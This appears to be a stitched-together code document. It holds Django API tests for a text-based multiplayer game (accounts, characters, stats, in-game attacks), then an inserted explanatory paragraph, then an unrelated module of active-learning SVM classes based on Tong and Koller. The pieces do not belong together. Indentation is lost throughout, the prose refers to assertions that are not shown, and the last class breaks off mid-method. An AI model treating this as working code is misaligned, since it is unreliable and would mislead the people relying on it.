insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# update character stats: hp | max_hp | total_attack | total_defense | attack_cool_time
# max_hp
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'max_hp', 'num': '1', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success max_hp changed'.encode(), 'Should be same'
# hp
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'hp', 'num': '1', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success hp changed'.encode(), 'Should be same'
# total_attack
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'total_attack',
'num': '2', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success total attack changed'.encode(), 'Should be same'
# total_defense
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'total_defense',
'num': '3', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success total defense changed'.encode(), 'Should be same'
# get character stats
insert_data = {'view_name': 'get_character_stats', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == \
'hello_name01 hp : 101/101 total attack : 13 attack cool time : 3.0 total defense : 14'.encode(), \
'Should be same'
# total_cool_time
insert_data = \
{'view_name': 'update_character_stats', 'stats': 'attack_cool_time',
'num': '-0.2', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'Success attack cool time changed'.encode(), 'Should be same'
# get character stats
insert_data = {'view_name': 'get_character_stats', 'character_name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == \
'hello_name01 hp : 101/101 total attack : 13 attack cool time : 2.8 total defense : 14'.encode(), \
'Should be same'
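The expected stat strings in this test follow from simple arithmetic on the starting stats asserted earlier (100/100 hp, 11 attack, 11 defense, 3.0 cool time) plus the deltas posted above. A quick worked check:

```python
# starting stats as reported by get_character_stats before any update
max_hp, attack, defense, cool = 100, 11, 11, 3.0
# apply the update_character_stats deltas issued in this test
max_hp += 1      # max_hp +1 -> 101
attack += 2      # total_attack +2 -> 13
defense += 3     # total_defense +3 -> 14
cool += -0.2     # attack_cool_time -0.2 -> 2.8
assert (max_hp, attack, defense) == (101, 13, 14)
assert round(cool, 1) == 2.8
```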
def test_and_select_character(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# select character
insert_data = {'view_name': 'select_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
def test_logout_check_now_connected_character_name(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# select second character
insert_data = {'view_name': 'select_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
insert_data = {'view_name': 'logout_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Logout success', 'Should be same'
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == '', 'Should be same'
def test_select_character_and_get_user_list_in_samelocation(self):
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
def test_select_character_and_get_two_user_list_in_samelocation(self):
client = Client()
# USER 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
def test_two_character_in_same_room_and_attack_user1_to_user2(self):
client = Client()
# USER 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name01
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name01'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert Character.objects.get(name='hello_name01').hp == 90, 'Should be same'
assert response.content == 'Success attack hello_name01 -> hp : 90'.encode(), 'Should be same'
def test_two_character_in_same_room_and_attack_user2_to_user2(self):
client = Client()
# USER 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name03
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert Character.objects.get(name='hello_name03').hp == 100, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
# now client USER2 - attack a nonexistent character hello_name999
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name999'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert Character.objects.get(name='hello_name03').hp == 100, 'Should be same'
assert response.content == 'invalid'.encode(), 'Should be same'
def test_two_character_in_same_room_and_big_attack_user2_to_user1(self):
client = Client()
# USER 1
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'create_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 1, 'Should be equal'
assert MudUser.objects.get(pk=1).username == 'hello_world01', 'Should be equal'
# log in
client = Client()
insert_data = {'username': 'hello_world01', 'password': 'hello_world01', 'view_name': 'login_user'}
response = client.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name02'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name01'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# check now_connected_character_name
user = MudUser.objects.get(pk=1)
assert user.now_connected_character_name == insert_data['name'], 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01'.encode(), 'Should be same'
# USER 2
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'create_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create User {insert_data['username']}".encode(), 'Should be same'
assert MudUser.objects.count() == 2, 'Should be equal'
assert MudUser.objects.get(pk=2).username == 'hello_world02', 'Should be equal'
# log in
client02 = Client()
insert_data = {'username': 'hello_world02', 'password': 'hello_world02', 'view_name': 'login_user'}
response = client02.post('http://localhost:8000/api/muduser/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == b'Login success', 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# create character
insert_data = {'view_name': 'create_character', 'name': 'hello_name04'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success create character {insert_data['name']}".encode(), 'Should be same'
# select first character
insert_data = {'view_name': 'select_character', 'name': 'hello_name03'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == f"Success Character Select {insert_data['name']}".encode(), 'Should be same'
# get user list in same room
insert_data = {'view_name': 'get_userlist_in_room'}
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
assert response.content == 'hello_name01,hello_name03'.encode(), 'Should be same'
# now client USER2 - attack hello_name03 -> hello_name01
insert_data = {'view_name': 'attack_character', 'target_user': 'hello_name01'}
attacker = Character.objects.get(name='hello_name03')
attacker.total_attack = 99999
attacker.save()
response = client02.post('http://localhost:8000/api/character/', insert_data)
assert response.status_code == 200, 'Should be same'
# dead reset hp
assert Character.objects.get(name='hello_name01').hp == 100, 'Should be same'
assert Character.objects.get(name='hello_name01').location_x == 10, 'Should be same'
assert Character.objects.get(name='hello_name01').location_y == 10, 'Should be same'
assert Character.objects.get(name='hello_name01').location_z == 10, 'Should be same'
assert response.content == 'Success attack hello_name01 -> Dead'.encode(), 'Should be same'
from numpy import *
import numpy.random as nprandom
from scipy.stats import bernoulli
from scipy.stats import norm as normal
from scipy import linalg as lin
import math
import random as rnd
from learners import *
from passive_learners import *
from utilities import *
import gc
#SOLVER = 'sgd'
SOLVER = 'cvxopt'
#SOLVER = 'hard_cvxopt'
#SOLVER = 'svm'
'''
Simple in-house implementation of a passive SVM learner.
Currently replaced by libsvm for experiments on larger datasets.
'''
class PassiveSVM(LinearLearner, ActiveBatchLearner, ActiveSourceLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d)
self.C = C
def active_batch_train(self, U, ids, oracle, label_budget):
m = min(len(U), label_budget)
# Query the labels of m examples
Y = array([oracle(ids[i]) for i in range(m)]).reshape((m, 1))
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(U[:m], Y)
# Use the separator found by SVM
self.w = svm.w
def active_source_train(self, source, oracle, label_budget):
U, ids = source(label_budget)
self.active_batch_train(U, ids, oracle, label_budget)
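The passive baseline above simply labels the first `label_budget` draws and fits once. A minimal self-contained sketch of that strategy, with a least-squares separator standing in for the SVM fit and a toy oracle (all names here are hypothetical, not part of this codebase):

```python
import numpy as np

def passive_train(U, oracle, label_budget):
    # Label the first `label_budget` points and fit a least-squares
    # separator through the origin (a stand-in for the SVM fit).
    m = min(len(U), label_budget)
    X = U[:m]
    y = np.array([oracle(i) for i in range(m)], dtype=float)
    w, *_ = np.linalg.lstsq(X, y, rcond=None)
    return w

U = np.array([[1.0, 0.0], [2.0, 0.1], [-1.0, 0.0], [-2.0, -0.1]])
oracle = lambda i: 1.0 if U[i, 0] > 0 else -1.0
w = passive_train(U, oracle, label_budget=4)
preds = np.sign(U @ w)  # -> [1., 1., -1., -1.]
```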
'''
Implementation of the simple margin procedure in Tong and Koller
'''
class SimpleMarginBatch(LinearLearner, ActiveBatchLearner):
def __init__(self, d):
LinearLearner.__init__(self, d, w = None)
self.pointsusage = 0
def active_batch_train(self, U, ids, oracle, label_budget):
m = len(U)
label_budget = min(m, label_budget)
self.pointsusage = label_budget
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of the first few examples (at most 10)
start = min(10, label_budget)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = SVM(self.d)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find the unlabeled example with the smallest margin
min_margin = inf
min_index = 0
for i in range(m):
if ids[i] in used:
continue
cur_margin = abs(svm.margin(U[i]))
if cur_margin < min_margin:
min_margin = cur_margin
min_index = i
# Query its label
X = vstack((X, U[min_index]))
Y = vstack((Y, array([oracle(ids[min_index])]).reshape((1,1))))
used.add(ids[min_index])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
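The selection step above reduces to querying the not-yet-labeled point with the smallest absolute margin |w . x| under the current separator. A pure-numpy sketch of just that rule (data and names hypothetical):

```python
import numpy as np

def simple_margin_query(w, U, used):
    # Index of the not-yet-queried point closest to the hyperplane w . x = 0
    margins = np.abs(U @ w)
    margins[list(used)] = np.inf  # skip points that are already labeled
    return int(np.argmin(margins))

w = np.array([1.0, 0.0])
U = np.array([[2.0, 1.0], [0.1, 3.0], [-1.5, 0.2]])
idx = simple_margin_query(w, U, used={0})  # -> 1: [0.1, 3.0] has margin 0.1
```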
'''
Implementation of the online version of simple margin procedure in Tong and Koller
'''
class SimpleMarginSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d):
LinearLearner.__init__(self, d, w = None)
def active_source_train(self, source, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of 10 examples
start = min(10, label_budget)
U, ids = source(start)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = SVM(self.d)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find an unlabeled example with a small margin
min_margin = min(abs(svm.margin(X[i])) for i in range(len(used)))
U, ids = source(1)
while abs(svm.margin(U[0])) >= min_margin:
U, ids = source(1)
# Query its label
X = vstack((X, U[0]))
Y = vstack((Y, array([oracle(ids[0])]).reshape((1,1))))
used.add(ids[0])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Soft SVM online version of simple margin described in Tong and Koller
'''
class SimpleMarginSoftSVMSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
def active_source_train(self, source, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of 10 examples
start = min(10, label_budget)
U, ids = source(start)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find an unlabeled example with a small margin
min_margin = min(abs(svm.margin(X[i])) for i in range(len(used)))
U, ids = source(1)
while abs(svm.margin(U[0])) >= min_margin:
U, ids = source(1)
# Query its label
X = vstack((X, U[0]))
Y = vstack((Y, array([oracle(ids[0])]).reshape((1,1))))
used.add(ids[0])
# Run SVM on all the labeled data
svm.batch_train(X, Y)
# Use the most recent separator found by SVM
self.w = svm.w
'''
Soft SVM online version of average margin described in Tong and Koller
'''
class AverageMarginSoftSVMSource(LinearLearner, ActiveSourceLearner):
def __init__(self, d, C):
LinearLearner.__init__(self, d, w = None)
self.C = C
def active_source_train(self, source, oracle, label_budget):
# Create holders for the labeled data
X = array([]).reshape((0, self.d))
Y = array([]).reshape((0, 1))
used = set()
# Query the labels of 10 examples
start = min(10, label_budget)
U, ids = source(start)
for i in range(start):
X = vstack((X, U[i]))
Y = vstack((Y, array([oracle(ids[i])]).reshape((1,1))))
used.add(ids[i])
# Run standard SVM on the labeled data
svm = soft_SVM(self.d, self.C)
svm.batch_train(X, Y)
# Until the label budget is reached
while len(used) < label_budget:
# Find an unlabeled example with a small margin
# take the mean, not the sum, of the signed margins of the labeled pool
avg_margin = sum(Y[i] * svm.margin(X[i]) for i in range(len(used))) / len(used)
U, ids = source(1)
while abs(svm.margin(U[0])) >= 0.5 * avg_margin:
U, ids = source(1)
# Query its label
X = vstack((X, U[0]))
Y = vstack((Y, array([oracle(ids[0])]).reshape((1,1))))
used.add(ids[0])
